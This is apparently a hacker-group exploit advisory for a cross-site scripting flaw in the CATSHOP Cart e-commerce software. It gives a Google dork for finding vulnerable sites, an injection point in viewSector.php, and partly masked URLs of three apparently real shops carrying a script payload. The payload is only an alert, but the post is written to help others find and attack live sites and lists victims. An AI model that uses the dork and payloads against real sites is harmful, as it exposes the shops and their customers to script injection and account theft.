0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> CATSHOP Cart - Persistent XSS Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< staff@thecybernuxbie.com >>> CP: +62856-2538-963 [ www.thecybernuxbie.com ] $ YM: nux_exploit - Info WebApps: CATSHOP &#232; un prodotto MNS completamente autogestito e dato in utilizzo al cliente presso i nostri server Web. CATSHOP is fully self-managed and MNS products used since our customers in the web server. This Content Develop By: http://www.mns.it/site/mns/ - Google Dork: inurl:"/viewSector.php?id=" - Exploit Concept: http://lokalisasi/viewSector.php?id=[XSS] - Sample Web Persistent XSS Vulnerability: http://www.sxxetal.biz/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS] http://gloxxxaslochi.com/catshop230608/viewSector.php?id=<script>alert(31337);</script> <:- [XSS] http://reixxxgroup.it/cat_shop040708/viewSector.php?id=<script>alert(31337);</script> <:- [XSS] -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################